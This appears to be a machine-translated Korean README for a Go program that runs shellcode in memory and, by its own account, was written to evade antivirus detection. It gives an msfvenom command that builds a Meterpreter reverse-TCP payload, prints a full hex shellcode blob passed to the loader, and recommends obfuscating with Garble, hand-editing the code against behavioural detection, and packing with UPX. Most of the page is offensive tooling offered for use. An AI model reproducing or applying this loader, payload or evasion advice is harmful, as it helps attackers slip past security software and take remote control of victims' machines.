go shellcode
1.0.0
이것은 모두 메모리에서 Shellcode를 자체 프로세스로 실행하는 프로그램입니다. 이것은 안티 바이러스 탐지를 물리 치기 위해 작성되었습니다. 이것은 이제 Virtool : Win32/Shrine.a로 감지되고 있습니다. Garble과 같은 도구를 사용하여 이진을 난독 화하여 정적 분석을 물리칩니다. 행동 분석을 물리 치기 위해 코드를 직접 변경하십시오.
64 비트 쉘 코드 만 64 비트 프로세스에서 실행됩니다. 쉘 코드 아키텍처를 자동으로 설정할 수 없습니다.
msfvenom 또는 metasploit를 사용하여 약간의 쉘 코드를 16 진 형식으로 생성하십시오.
$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:windowstemp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5
때로는 쉘 코드가 인수가있는 명령 줄의 한계보다 큽니다. 대신 모든 것을 배치 스크립트에 넣으십시오.
표준 GO 빌딩 단계. 구스를 windows 로 설정하고 386 또는 amd64 의 쉘 코드와 동일하게 GOARCH를 설정하십시오. 이것은 쉘 코드의 아키텍처를 감지 할 수 없습니다.
결과 바이너리는 약간 크고 2.1m이지만 UPX와 약 508K와 잘 압축됩니다.
